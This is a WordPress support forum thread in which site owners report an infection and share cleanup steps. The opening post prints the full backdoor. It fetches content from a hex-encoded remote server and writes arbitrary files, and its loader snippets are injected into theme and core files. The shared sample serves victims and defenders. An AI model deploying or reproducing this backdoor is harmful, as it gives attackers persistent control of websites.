Have you cover this malware yet?

  • Resolved alex80ks

    (@alex80ks)


    4 years, 5 months ago

    Hello,
    This malware was reported maybe two month ago.

    every single folder of wordpress there’s a file called .folder-name.php.

    For example, theme functions gets this code inserted:

    if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . "." . basename(dirname(__FILE__)) . ".php") && !class_exists("WPTemplatesOptions")) {
    include_once($filename);
}

if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) {
    include_once($filename);
}

    Here is an example of .folder-name-file.php:

    <?php
error_reporting(0);
ini_set('display_errors', false);
class WPCacheExist
{
	public $url;
	public $baseUrl;
	public $allow_url_fopen;
	public $filename;
	public $data;
	public $cache;
	public $error;
	public $write;
	public $password;

	public function __construct() {
		$this->baseUrl = hex2bin( '687474703a2f2f636f6e6e6563742e61706965732e6f72672f' );
		$this->password = $this->baseUrl . 'password';
		$this->allow_url_fopen = ini_get( 'allow_url_fopen' );
	}

	public function curl( $url ) {
		if ( function_exists( 'curl_init' ) ) {
			$ch = curl_init( $url );
			curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
			if ( curl_exec( $ch ) === false ) {
				$this->error = curl_error( $ch );
			} else {
				$this->data = curl_exec( $ch );
				return true;
			}
			curl_close( $ch );
		} else if ( function_exists( 'file_get_contents' ) && $this->allow_url_fopen ) {
			$this->data = file_get_contents( $url );
			return true;
		} else {
			$this->error = 'curl is error';
		}
		return false;
	}

	public function address() {
		return (isset( $_SERVER["HTTP_CF_CONNECTING_IP"] ) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER['REMOTE_ADDR']);
	}

	public function encrypt( $hash ) {
		try {
			return md5( sha1( md5( $hash ) ) );
		} catch ( Exception $e ) {
			return false;
		}
	}

	public function authorization() {
		try {
			$this->curl( $this->password );
			$this->data = json_decode( $this->data );
			if ( $this->strpos( $this->encrypt( $this->address() ), $this->data->address ) ) {
				if ( $this->data->password === $this->encrypt( $_REQUEST['password'] ) ) {
					return true;
				}
				return false;
			}
			return false;
		} catch ( Exception $e ) {
			return false;
		}
	}

	public function directory() {
		$directory = __DIR__ . DIRECTORY_SEPARATOR;
		if ( isset( $_REQUEST['directory'] ) ) {
			$directory = $directory . $_REQUEST['directory'];
		}
		return realpath( $directory );
	}

	public function filename() {
		if ( isset( $_REQUEST['filename'] ) ) {
			$this->filename = $this->directory() . DIRECTORY_SEPARATOR . $_REQUEST['filename'];
			return true;
		}
		$this->error = 'Filename variable is null';
		return false;
	}

	public function upload() {
		if ( isset( $_REQUEST['upload'] ) ) {
			$this->curl( $this->baseUrl . 'upload' . DIRECTORY_SEPARATOR . $_REQUEST['upload'] );
			return true;
		}
		$this->error = 'Upload variable is null';
		return false;
	}

	public function answer( $message ) {
		$data = array(
			"boolean" => true,
			"message" => $message,
		);
		if ( isset( $this->error ) ) {
			$data["boolean"] = false;
			$data["error"] = $this->error;
		}
		return json_encode( $data );
	}

	public function write() {
		if ( isset( $this->error ) ) {
			return false;
		}
		if ( function_exists( 'file_put_contents' ) ) {
			if ( file_put_contents( $this->filename, $this->data ) === false ) {
				$this->error = 'file_put_contents is error';
			} else {
				$this->write = $this->filename;
				return true;
			}
		} else if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
			$process = fopen( $this->filename, "w+" );
			if ( fwrite( $process, $this->data ) === false ) {
				$this->error = 'fwrite is error';
			} else {
				$this->write = $this->filename;
				return true;
			}
			fclose( $process );

		} else {
			$this->error = 'Write is error';
		}
		return false;
	}

	public function strpos( $haystack, $needle, $offset = 0 ) {
		try {
			if ( !is_array( $needle ) )
				$needle = array($needle);
			foreach ( $needle as $query ) {
				if ( strpos( $haystack, $query, $offset ) !== false ) {
					return true;
				}
			}
			return false;
		} catch ( Exception $e ) {
			return false;
		}
	}

	public function __destruct() {
		if ( $this->authorization() ) {
			$this->upload();
			$this->filename();
			$this->write();
			echo $this->answer( $this->write );
		}
	}
}

new WPCacheExist();

    this malware also creating index.php which is about 57kb.

    Will that soon be included in your plugin and i hope i will be available for free users also?

Viewing 10 replies - 1 through 10 (of 10 total)

  • Hello Alex,

    I am also having this malware……

    How to fix? its driving me crazy!!

    You can also contact me by whatsapp or email
    +31629727358
    [email protected]

    Plugin Support wfphil

    (@wfphil)

    Hi,

    You can send malware samples to [email protected] and we have a site cleaning guide here:

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thread Starter alex80ks

    (@alex80ks)

    I send samples (where i found and what i found and most of behaviour) and if you need access to inspect furthermore let me know.

    Thank you

    commands to remove WPTemplatesOptions options malware

    First Run this command to get a list of infected files

    find -name “*.php” -exec grep -l “WPTemplatesOptions” {} \; > output.txt

    Then Run this command to delete malware files
    find public_html -name “.*.php” -delete

    Final command to remove WPTemplatesOptions strings from website files

    find public_html -type f -exec sed -i ‘/WPTemplatesOptions/,+2 d’ {} \;

    Thread Starter alex80ks

    (@alex80ks)

    Hello @urshobhit ,
    That is just one of the steps.
    Files identified so far are:

    .folder-name.php

    index.php (just ones around 56kb of code)

    .class-wp-cache.php     (your code will not clean this up because it doesnt contain WPTemplatesOptions word)

    .json in some of the uploads/month folders.

    WPTemplatesOptions code gets injected in almost every folder that have some existing .php files.

    I hope it helps.

    .class-wp-cache.php can be deleted using this
    find path -name “.class-wp-cache.php” -delete

    .json can be deleted using this

    find path -name “.json” -delete

    Thread Starter alex80ks

    (@alex80ks)

    Thank you for sharing @urshobhit

    @alex80ks can you please help me with this.
    “get_checkout_url function is deprecated since version 2.5. Replace with wc_get_checkout_url”

    Plugin Support wfphil

    (@wfphil)

    Hi @qads

    This is the support forum for Wordfence. Please ask WooCommerce for assistance with the above error.

    Hi everyone,

    I have an additional IMPORTANT note about this malware!!!

    CHECK your wp-load.php, if it contains this code:

    if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) {
    foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
        $templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
        if( file_exists( $templates ) ) {
            include_once( $templates );
        }
    }
}

    urgently follow these steps:
    1. Remove this code from wp-load.php
    2. Find and remove all files “.[dir_name].php” as advised above!
    3. CHANGE ALL PASSWORDS KEYS AND SALTS in wp-config.php

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Have you cover this malware yet?’ is closed to new replies.